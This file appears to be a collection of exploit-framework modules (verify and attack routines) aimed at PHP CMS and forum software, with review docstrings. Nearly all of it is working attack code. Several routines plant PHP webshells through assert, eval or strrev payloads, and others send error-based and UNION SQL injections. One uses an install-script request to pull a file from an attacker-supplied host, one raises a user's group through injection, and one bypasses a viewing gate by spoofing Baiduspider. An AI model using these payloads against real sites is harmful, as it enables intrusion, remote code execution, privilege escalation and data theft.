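def _attack(self):
    """Plant a PHP ``assert($_POST[alpha])`` hook via /search.php and confirm it runs.

    Two requests are sent: a GET to /search.php whose query string (built on
    the shared ``self.params`` dict, which is mutated in place) carries the PHP
    payload in ``title``, then a POST to /do/jf.php that pushes ``print <marker>;``
    through the planted hook.

    Returns:
        Result with ``ShellInfo['URL']`` (absolute URL of /do/jf.php) and
        ``ShellInfo['Content']`` (the planted payload) when the marker is echoed
        back with HTTP 200; an empty Result otherwise.

    Fix vs. the original: ``action`` was first set to "search" and then
    overwritten with "addjf" before any read -- the dead store is dropped
    (the verify variant never had it).
    """
    result = Result()
    php_payload = "${@assert($_POST[alpha])}"
    marker = "9876541"

    self.params["mid"] = "1"
    self.params["keyword"] = "asd"
    self.params["postdb[city_id]"] = "../../admin/hack"
    self.params["hack"] = "jfadmin"
    self.params["action"] = "addjf"
    self.params["Apower[jfadmin_mod]"] = "1"
    self.params["fid"] = "1"
    self.params["title"] = php_payload

    search_url = self.urlJoin("/search.php")
    # The body of this response is never inspected; the request only plants the hook.
    self.http.get(search_url, params=self.params)

    shell_url = search_url.replace("search.php", "do/jf.php")
    post_data = {"alpha": "print {0};".format(marker)}
    response = self.http.post(shell_url, data=post_data)
    if response.status_code == 200 and marker in response.content:
        result["ShellInfo"] = {}
        result["ShellInfo"]["URL"] = self.baseURL + "/do/jf.php"
        result["ShellInfo"]["Content"] = php_payload
    return result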
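def _verify(self):
    """Verify an error-based SQL injection through the /search.php sort form.

    ``selectsortid`` carries a duplicate-key (``count(*)/rand(0)/group by``)
    injection so that MySQL's error message echoes ``sig``. A hit is an HTTP
    200 whose body contains both ``sig`` and the string "SQL".

    Returns:
        Result with ``VerifyInfo['URL']`` (the URL that was posted to) and
        ``VerifyInfo['Payload']`` (the raw request body) on a hit; an empty
        Result otherwise.

    Fix vs. the original: ``VerifyInfo['URL']`` was set to the request body
    (the same value as ``Payload``); it now reports the URL, matching the
    other verify routines in this file.
    """
    result = Result()
    sig = "2c1743a391305fbf367df8e4f069f9f9"
    injection = (
        "3 where tid=(select 1 from (select count(*),concat({0},"
        "floor(rand(0)*2))x from information_schema.tables group by x)a)#"
    ).format(sig)
    payload = {
        "formhash": "04949b0",  # fixed value; presumably not checked by the target -- unverified
        "srchtxt": "aa",
        "srchtype": "threadsort",
        "st": "on",
        "sortid": "3",
        "selectsortid": injection,
        "searchsubmit": "true",
    }
    url = self.urlJoin("/search.php")
    response = self.http.post(url, data=payload)
    if response.status_code != 200:
        return result
    body = response.content
    if sig in body and "SQL" in body:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]["URL"] = url
        result["VerifyInfo"]["Payload"] = response.request.body
    return result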
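def _verify(self):
    """Fetch every path produced by ``self.genPath()`` and report those answering 200.

    Options are read from ``self.elseArgs``: ``type`` ("discuz" or "discuzx";
    anything else falls back to "discuz"), ``date`` (default "15-01-01"),
    ``days`` (default "10") and ``dirs`` (default "1"); ``days`` and ``dirs``
    are cast to int. When the target URL names a ``.php`` script the probes
    are made relative to ``self.baseURL`` instead of ``self.url``.

    Returns:
        Result with ``Else['Target']`` (``self.url``) and ``Else['Info']``
        (``str`` of the list of live URLs) when at least one path answered
        200; an empty Result otherwise.

    Fix vs. the original: a request that raised ``RequestException`` was
    swallowed and execution fell through to ``response.status_code`` with
    ``response`` either unbound (first iteration, NameError) or left over
    from the previous path, which could report a dead path as alive. A
    failed request now skips that path. Two debug prints were removed.
    """
    result = Result()
    dctype = self.elseArgs.get("type", "discuz").lower()
    if dctype not in ("discuz", "discuzx"):
        dctype = "discuz"
    date = self.elseArgs.get("date", "15-01-01")
    days = int(self.elseArgs.get("days", "10"))
    dirs = int(self.elseArgs.get("dirs", "1"))

    base = self.baseURL if ".php" in self.url else self.url
    base = base.rstrip("/")

    alives = []
    for path in self.genPath(dctype, date, days, dirs):
        target = base + path
        try:
            response = self.http.get(target)
        except self.http.RequestException:
            continue  # unreachable path; never reuse a stale response
        if response.status_code == 200:
            alives.append(target)

    if alives:
        result["Else"] = {}
        result["Else"]["Target"] = self.url
        result["Else"]["Info"] = str(alives)
    return result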
def _verify(self):
    """Verify that a PHP ``assert($_POST[alpha])`` hook can be planted via /search.php.

    A GET to /search.php with the query string built on ``self.params``
    (mutated in place) carries the payload in ``title``; a follow-up POST to
    /do/jf.php sends ``print <marker>;`` in ``alpha`` and a hit is an HTTP 200
    whose body contains the marker.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (``str`` of the POST data) on a hit; an
        empty Result otherwise.
    """
    result = Result()
    marker = "9876541"
    php_payload = "${@assert($_POST[alpha])}"
    self.params.update({
        "mid": "1",
        "keyword": "asd",
        "postdb[city_id]": "../../admin/hack",
        "hack": "jfadmin",
        "action": "addjf",
        "Apower[jfadmin_mod]": "1",
        "fid": "1",
        "title": php_payload,
    })

    search_url = self.urlJoin("/search.php")
    # Planting request; its response is not examined.
    self.http.get(search_url, params=self.params)

    shell_url = search_url.replace("search.php", "do/jf.php")
    post_data = {"alpha": "print {0};".format(marker)}
    response = self.http.post(shell_url, data=post_data)
    if response.status_code != 200 or marker not in response.content:
        return result
    result["VerifyInfo"] = {"URL": self.url, "Payload": str(post_data)}
    return result
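def _attack(self):
    """Drive /install/index.php (step 11) to pull a file onto the target, then request it.

    Requires two ``--elseargs`` values in ``self.elseArgs``: ``vulfile`` (the
    file name passed as ``install_demo_name`` and then requested back under
    /install/) and ``vulpath`` (passed as ``updateHost``). Without both it
    prints a usage hint and returns ``[]``, as the original did.

    Returns:
        Result with ``ShellInfo['URL']`` when the requested file answers
        HTTP 200; an empty Result otherwise (or ``[]`` on missing arguments).

    Changes vs. the original: the usage message is printed through a
    parenthesised ``print`` so it behaves the same on Python 2 and 3, and
    the commented-out debug prints are removed.
    """
    result = Result()
    vulfile = self.elseArgs.get("vulfile", None)
    vulpath = self.elseArgs.get("vulpath", None)
    if not vulfile or not vulpath:
        print("Missing --elseargs, should be '--elseargs vulfile=shell.php#vulpath=http://aa.com'")
        return []

    install_url = self.urlJoin("/install/index.php")

    # First request: install_demo_name points at the config-update script.
    self.params["step"] = "11"
    self.params["insLockfile"] = "a"
    self.params["s_lang"] = "a"
    self.params["install_demo_name"] = "../data/admin/config_update.php"
    self.http.get(install_url, params=self.params)

    # Second request: same step, now naming vulfile and the updateHost it
    # should be fetched from (what the target does with updateHost is not
    # visible here).
    self.params["install_demo_name"] = vulfile
    self.params["updateHost"] = vulpath
    self.http.get(install_url, params=self.params)

    # Only existence is checked (HTTP 200); the body is not inspected, so a
    # target that answers 200 for unknown paths yields a false positive.
    shell_url = install_url.replace("index.php", vulfile)
    response = self.http.get(shell_url)
    if response.status_code == 200:
        result["ShellInfo"] = {}
        result["ShellInfo"]["URL"] = shell_url
    return result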
def _verify(self):
    """Report the link produced by ``self.genBypassLink()`` for the target.

    No request is made here; the method only packages the generated link.

    Returns:
        Result with ``Else['Target']`` (``self.url``) and ``Else['Info']``
        (whatever ``genBypassLink()`` returns).
    """
    result = Result()
    result["Else"] = {"Target": self.url, "Info": self.genBypassLink()}
    return result
def _attack(self):
    """Confirm /inc/splitword.php evaluates the ``Y2hlbmdzaGlzLmMjd`` POST parameter.

    Posts ``phpinfo();`` in that parameter and treats the presence of
    ``_SERVER["HTTP_HOST"]`` (a string phpinfo output is expected to contain)
    in a 200 response as success.

    Returns:
        Result with ``ShellInfo['URL']`` (the splitword endpoint) and
        ``ShellInfo['Content']`` (an ``@eval`` one-liner naming the same
        parameter) on success; an empty Result otherwise.
    """
    result = Result()
    param_name = "Y2hlbmdzaGlzLmMjd"
    endpoint = self.urlJoin("/inc/splitword.php")
    response = self.http.post(endpoint, data={param_name: "phpinfo();"})
    if response.status_code != 200:
        return result
    if '_SERVER["HTTP_HOST"]' not in response.content:
        return result
    result["ShellInfo"] = {
        "URL": endpoint,
        "Content": "@eval($_POST['Y2hlbmdzaGlzLmMjd']);",
    }
    return result
def _verify(self):
    """Verify that /inc/splitword.php evaluates the ``Y2hlbmdzaGlzLmMjd`` POST parameter.

    Posts ``phpinfo();`` and treats ``_SERVER["HTTP_HOST"]`` in a 200 body as
    the success signal.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the PHP sent) on success; an empty Result
        otherwise.
    """
    result = Result()
    php_code = "phpinfo();"
    endpoint = self.urlJoin("/inc/splitword.php")
    response = self.http.post(endpoint, data={"Y2hlbmdzaGlzLmMjd": php_code})
    hit = response.status_code == 200 and '_SERVER["HTTP_HOST"]' in response.content
    if hit:
        result["VerifyInfo"] = {"URL": self.url, "Payload": php_code}
    return result
def _verify(self):
    """Verify code execution via a payload smuggled in the User-Agent header.

    ``self._genPayload()`` wraps ``echo "asdfgh123456";`` into the header
    value; one request sends it, a second plain request (through ``session``)
    is then checked for the echoed token.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the header value) when the token shows up
        in a 200 response; an empty Result otherwise.
    """
    result = Result()
    token = "asdfgh123456"
    php_code = '''echo "asdfgh123456";'''
    ua_payload = self._genPayload(php_code)

    first = self.http.get(self.url, headers={"User-Agent": ua_payload})
    if first.status_code != 200:
        return result

    # NOTE(review): `session` is not defined in this method; presumably a
    # module-level HTTP session -- confirm it exists, otherwise this raises
    # NameError on every 200 response.
    second = session.get(self.url)
    if second.status_code == 200 and token in second.content:
        result["VerifyInfo"] = {"URL": self.url, "Payload": ua_payload}
    return result
def _verify(self):
    """Verify SQL injection through ``table_album`` on /blog/ajax.php.

    Sends ``sig`` as the ``table_album`` value (as query-string parameters on
    a POST) so that it lands in a table name; a hit is a 200 response
    containing both ``sig`` and "doesn't exist" (the MySQL unknown-table error).

    Returns:
        Result with ``VerifyInfo['URL']`` (the ajax endpoint) and
        ``VerifyInfo['Payload']`` (the full request URL) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    sig = "2c1743a391305fbf367df8e4f069f9f9"
    query = "?inc=edit_sort&act=modify&name[]=yyy"
    injected = {"table_album": "{0}".format(sig)}
    endpoint = self.urlJoin("/blog/ajax.php")
    response = self.http.post(endpoint + query, params=injected)
    if response.status_code != 200:
        return result
    body = response.content
    if sig in body and "doesn't exist" in body:
        result["VerifyInfo"] = {"URL": endpoint, "Payload": response.request.url}
    return result
def _verify(self):
    """Verify code execution via ``GLOBALS[_DCACHE][smilies]`` cookie values.

    The cookie sets a ``/.*/eui`` search pattern and ``phpinfo();`` as the
    replacement; ``_SERVER["HTTP_HOST"]`` in a 200 response body is taken as
    evidence the replacement was evaluated.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the cookie string) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    marker = '_SERVER["HTTP_HOST"]'
    cookie = (
        "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; "
        "GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
    )
    response = self.http.get(self.url, headers={"Cookie": cookie})
    if response.status_code == 200 and marker in response.content:
        result["VerifyInfo"] = {"URL": self.url, "Payload": cookie}
    return result
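def _verify(self):
    """Verify SQL injection through the base64-encoded ``aid`` of /forum.php.

    The ``aid`` parameter carries a base64-encoded UNION SELECT that is meant
    to echo ``sig``; a hit is a 200 response whose body contains ``sig``.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the plain injection string) on a hit; an
        empty Result otherwise.

    Fix vs. the original: it tested ``sig in response.request.url``, i.e. the
    request it had itself just sent. Because ``aid`` is base64-encoded the
    plain ``sig`` never appears there, so the check could not succeed; the
    response body is what can echo ``sig`` and is what is checked now. The
    encode/decode around ``b64encode`` keeps the call working on Python 3,
    where it requires bytes, and is a no-op for the ASCII payload on Python 2.
    """
    result = Result()
    sig = "2c1743a391305fbf367df8e4f069f9f9"
    payload = "1' and 1=2 union all select 1,'{0}".format(sig)
    self.params["mod"] = "attachment"
    self.params["findpost"] = "ss"
    self.params["aid"] = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    url = self.urlJoin("/forum.php")
    response = self.http.get(url, params=self.params)
    if response.status_code == 200 and sig in response.content:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]["URL"] = self.url
        result["VerifyInfo"]["Payload"] = payload
    return result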
def _verify(self):
    """Verify SQL injection through the ``shopid`` parameter of /shop.php.

    ``shopid`` carries a ``concat_ws(...)/count(*)/group by`` expression that
    embeds ``sig``; a hit is a 200 response whose body contains ``sig``.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the injection string) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    sig = "2c1743a391305fbf367df8e4f069f9f9"
    injection = (
        "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), "
        "count(*) from information_schema.tables group by 1)a;"
    ).format(sig)
    self.params.update({"ac": "view", "shopid": injection})
    response = self.http.get(self.urlJoin("/shop.php"), params=self.params)
    if response.status_code != 200 or sig not in response.content:
        return result
    result["VerifyInfo"] = {"URL": self.url, "Payload": injection}
    return result
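def _attack(self):
    """Drop a PHP shell at /images/parse.php via a payload in the User-Agent header.

    The dropped file calls the function named by the reversed GET parameter
    ``f`` (``f=tressa`` reverses to ``assert``) with the POST parameter
    ``pass`` as its argument, so anyone who knows both parameter names can run
    code -- there is no authentication on it. It is written three directory
    levels above the executing file, under ``images/parse.php``.

    Returns:
        Result with ``ShellInfo['URL']`` (absolute URL of the shell, with
        ``f=tressa``) and ``ShellInfo['Content']`` ("password: pass") when the
        dropped file answers HTTP 200; an empty Result otherwise.

    Changes vs. the original: the reported URL was the bare path
    "/images/parse.php?f=tressa"; it is now absolute, as in the other attack
    routines of this file. Commented-out alternative payloads were removed.
    """
    result = Result()
    php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
    ua_payload = self._genPayload(php_code)

    planted = self.http.get(self.url, headers={"User-Agent": ua_payload})
    if planted.status_code != 200:
        return result

    # NOTE(review): `session` is not defined in this method; presumably a
    # module-level HTTP session -- confirm, otherwise NameError. The result of
    # this plain fetch is ignored, as in the original (presumably it triggers
    # execution of the planted code -- unverified).
    session.get(self.url)

    shell_url = self.urlJoin("/images/parse.php")
    probe = session.get(shell_url)
    if probe.status_code == 200:
        result["ShellInfo"] = {}
        result["ShellInfo"]["URL"] = shell_url + "?f=tressa"
        result["ShellInfo"]["Content"] = "password: pass"
    return result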
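def _attack(self):
    """Inject ``set groupid=3 where uid=<uid>`` through ``table_album`` on /blog/ajax.php.

    ``uid`` comes from ``self.elseArgs`` (default "3"). The ``table_album``
    value closes the table name and appends the ``set ... where ...#`` tail;
    it is sent as query-string parameters on a POST, exactly like the paired
    verify routine.

    Returns:
        Result with ``VerifyInfo['URL']`` (the ajax endpoint) and
        ``VerifyInfo['Payload']`` (the full request URL) when the request is
        accepted; an empty Result otherwise.

    Fix vs. the original: the success test referenced ``sig``, which this
    method never defines (left over from the verify variant), so every 200
    response raised NameError. The verify variant treats the MySQL "doesn't
    exist" error as its signal; for this payload that same error means the
    injected statement was rejected, so its absence on a 200 response is used
    here. This is a weak oracle -- it does not confirm the groupid change --
    TODO confirm against a live target.
    """
    result = Result()
    uid = self.elseArgs.get("uid", "3")
    query = "?inc=edit_sort&act=modify&name[]=yyy"
    injected = {"table_album": "memberdata` set groupid=3 where uid={0}#".format(uid)}
    url = self.urlJoin("/blog/ajax.php")
    response = self.http.post(url + query, params=injected)
    if response.status_code != 200:
        return result
    if "doesn't exist" not in response.content:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]["URL"] = url
        result["VerifyInfo"]["Payload"] = response.request.url
    return result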
def _verify(self):
    """Verify UNION-based SQL injection through the ``pre`` parameter of /blog/ajax.php.

    The fixed query string selects ``inc=ol_module`` with a traversal in
    ``moduleid``; ``pre`` carries a UNION SELECT whose 8th column is ``sig``.
    A hit is a 200 response whose body contains ``sig``.

    Returns:
        Result with ``VerifyInfo['URL']`` (the ajax endpoint) and
        ``VerifyInfo['Payload']`` (the full request URL) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    sig = "9876541"
    query = (
        "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125"
        "&webdb[web_open]=1&webdb[cache_time_js]=-1"
    )
    union = "qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
    endpoint = self.urlJoin("/blog/ajax.php")
    response = self.http.get(endpoint + query, params={"pre": union.format(sig)})
    hit = response.status_code == 200 and sig in response.content
    if hit:
        result["VerifyInfo"] = {"URL": endpoint, "Payload": response.request.url}
    return result
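def _verify(self):
    """Verify that a Baiduspider User-Agent bypasses the "才能浏览" viewing gate.

    Two requests: one with the default client headers and one claiming to be
    Baiduspider. A hit requires the gate text to be present in the plain
    response (in either UTF-8 or GBK encoding) and absent in both encodings
    from the spider response, which must be HTTP 200.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the spider User-Agent) on a hit; an empty
        Result otherwise.

    Fix vs. the original: the presence test required the gate text in BOTH
    the UTF-8 and the GBK encoding of the plain response, which a page served
    in a single encoding never satisfies (the attack variant had the same
    condition; the install-check verify in this file already uses ``or``).
    Either encoding is now sufficient. The commented-out alternative
    User-Agent was removed.
    """
    result = Result()
    sig = u"才能浏览"
    spider_ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

    plain = self.http.get(self.url)
    as_spider = self.http.get(self.url, headers={"User-Agent": spider_ua})
    if as_spider.status_code != 200:
        return result

    utf8_sig = sig.encode("utf-8")
    gbk_sig = sig.encode("gbk")
    gated_for_users = utf8_sig in plain.content or gbk_sig in plain.content
    open_for_spider = utf8_sig not in as_spider.content and gbk_sig not in as_spider.content
    if gated_for_users and open_for_spider:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]["URL"] = self.url
        result["VerifyInfo"]["Payload"] = spider_ua
    return result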
def _verify(self):
    """Verify template write + include through /blog/ajax.php ``maketpl``.

    First request writes ``<?php phpinfo();?>`` into ``template/blue.htm``
    via ``postdb[code]`` (the PHP tag is placed raw in the query string);
    second request includes that template through a traversal in ``job``. A
    hit is ``_SERVER["HTTP_HOST"]`` in a 200 response to the second request.

    NOTE(review): this verify overwrites ``template/blue.htm`` on the target
    (the attack variant uses green.htm); it is not side-effect free.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the PHP written) on a hit; an empty Result
        otherwise.
    """
    result = Result()
    marker = '_SERVER["HTTP_HOST"]'
    php_tag = "<?php phpinfo();?>"
    endpoint = self.urlJoin("/blog/ajax.php")

    write_query = (
        "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin"
        "&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm"
        "&postdb[code]={0}"
    ).format(php_tag)
    self.http.get(endpoint + write_query)

    include_query = "?inc=edit_sort&job=../../../../template/blue"
    included = self.http.get(endpoint + include_query)
    if included.status_code == 200 and marker in included.content:
        result["VerifyInfo"] = {"URL": self.url, "Payload": php_tag}
    return result
def _verify(self):
    """Verify error-based SQL injection through ``type`` on /blog/member/update_sort.php.

    ``type`` carries an ``updatexml(...)`` expression that makes MySQL echo
    ``sig`` in its error; the value is sent as query-string parameters on a
    GET to ``?step=1``. A hit is a 200 response whose body contains ``sig``.

    Returns:
        Result with ``VerifyInfo['URL']`` (the update_sort endpoint) and
        ``VerifyInfo['Payload']`` (the full request URL) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    sig = "9876541"
    endpoint = self.urlJoin("/blog/member/update_sort.php")
    xml_error = "area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#".format(sig)
    response = self.http.get(endpoint + "?step=1", params={"type": xml_error})
    if response.status_code != 200 or sig not in response.content:
        return result
    result["VerifyInfo"] = {"URL": endpoint, "Payload": response.request.url}
    return result
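def _attack(self):
    """Fetch the gated page as Baiduspider and save the response to ``result.html``.

    Same two-request check as the verify routine: the "才能浏览" gate text
    must appear in the plain response (UTF-8 or GBK) and be absent in both
    encodings from the spider response (which must be HTTP 200). On a hit the
    spider response body is written to ``result.html`` in the current working
    directory (an existing file of that name is overwritten).

    Returns:
        Result with ``FileInfo['Filename']`` = "result.html" on a hit; an
        empty Result otherwise.

    Fixes vs. the original: ``response2.conetnt`` (typo) raised
    AttributeError on every hit; the presence test required the gate text in
    BOTH encodings at once, which a single-encoding page never satisfies
    (either is now enough, as the install-check verify in this file does);
    the file is opened in binary mode so the raw body can be written on
    Python 3 as well as 2.
    """
    result = Result()
    sig = u"才能浏览"
    spider_ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

    plain = self.http.get(self.url)
    as_spider = self.http.get(self.url, headers={"User-Agent": spider_ua})
    if as_spider.status_code != 200:
        return result

    utf8_sig = sig.encode("utf-8")
    gbk_sig = sig.encode("gbk")
    gated_for_users = utf8_sig in plain.content or gbk_sig in plain.content
    open_for_spider = utf8_sig not in as_spider.content and gbk_sig not in as_spider.content
    if gated_for_users and open_for_spider:
        with open("result.html", "wb") as fd:
            fd.write(as_spider.content)
        result["FileInfo"] = {}
        result["FileInfo"]["Filename"] = "result.html"
    return result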
def _attack(self):
    """Write a PHP shell into ``template/green.htm`` through /blog/ajax.php ``maketpl``.

    The shell calls the function named by the reversed GET parameter ``f``
    (``f=tressa`` reverses to ``assert``) with the POST parameter ``pass`` as
    its argument; there is no authentication beyond knowing those names. The
    PHP tag is placed raw in the query string. Success is judged by fetching
    ``/template/green.htm`` directly and finding ``strrev`` in a 200 body.

    Returns:
        Result with ``ShellInfo['URL']`` (the ajax endpoint including the
        template via ``job`` plus ``f=tressa``) and ``ShellInfo['Payload']``
        ("password: pass") on success; an empty Result otherwise.
    """
    result = Result()
    marker = "strrev"
    shell_php = '<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>'
    endpoint = self.urlJoin("/blog/ajax.php")

    write_query = (
        "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin"
        "&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/green.htm"
        "&postdb[code]={0}"
    ).format(shell_php)
    self.http.get(endpoint + write_query)

    written_url = endpoint.replace("/blog/ajax.php", "/template/green.htm")
    written = self.http.get(written_url)
    if written.status_code != 200 or marker not in written.content:
        return result
    result["ShellInfo"] = {
        "URL": endpoint + "?inc=edit_sort&job=../../../../template/green&f=tressa",
        "Payload": "password: pass",
    }
    return result
def _verify(self):
    """Verify error-based SQL injection through ``gids[]`` on faq.php ``grouppermission``.

    Posts a ``gids[99]`` / ``gids[100][0]`` pair carrying a duplicate-key
    injection that makes MySQL echo ``sig``. The target URL is ``self.url``
    when it already names faq.php, otherwise ``self.host`` +
    "/faq.php?action=grouppermission". A hit is a 200 response containing
    both ``sig`` and "SQL".

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (the raw request body) on a hit; an empty
        Result otherwise.
    """
    result = Result()
    sig = "2c1743a391305fbf367df8e4f069f9f9"
    injection = (
        ") and (select 1 from (select count(*),concat({0},"
        "floor(rand(0)*2))x from information_schema.tables group by x)a)#"
    ).format(sig)
    form = {"gids[99]": "'", "gids[100][0]": injection}

    if "faq.php" in self.url:
        target = self.url
    else:
        target = self.host + "/faq.php?action=grouppermission"

    response = self.http.post(target, data=form)
    if response.status_code != 200:
        return result
    body = response.content
    if sig in body and "SQL" in body:
        result["VerifyInfo"] = {"URL": self.url, "Payload": response.request.body}
    return result
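def _verify(self):
    """Verify that /install/index.php (step 11) accepts a traversal in ``install_demo_name``.

    Sends ``install_demo_name=../data/admin/config_update.php`` together with
    the fixed ``step``/``insLockfile``/``s_lang`` values on the shared
    ``self.params`` dict. A hit is a 200 response whose body contains the
    "远程获取失败" message in either GBK or UTF-8 encoding.

    Returns:
        Result with ``VerifyInfo['URL']`` (``self.url``) and
        ``VerifyInfo['Payload']`` (``str`` of the parameters sent) on a hit;
        an empty Result otherwise.

    Fix vs. the original: it assigned into a bare ``params`` name that this
    method never defines (NameError on every call); the paired attack
    routine uses ``self.params`` with exactly these keys, which is what is
    used here. The commented-out debug prints were removed.
    """
    result = Result()
    sig = u"远程获取失败"
    self.params["step"] = "11"
    self.params["insLockfile"] = "a"
    self.params["s_lang"] = "a"
    self.params["install_demo_name"] = "../data/admin/config_update.php"

    url = self.urlJoin("/install/index.php")
    response = self.http.get(url, params=self.params)
    if response.status_code != 200:
        return result
    body = response.content
    if sig.encode("gbk") in body or sig.encode("utf-8") in body:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]["URL"] = self.url
        result["VerifyInfo"]["Payload"] = str(self.params)
    return result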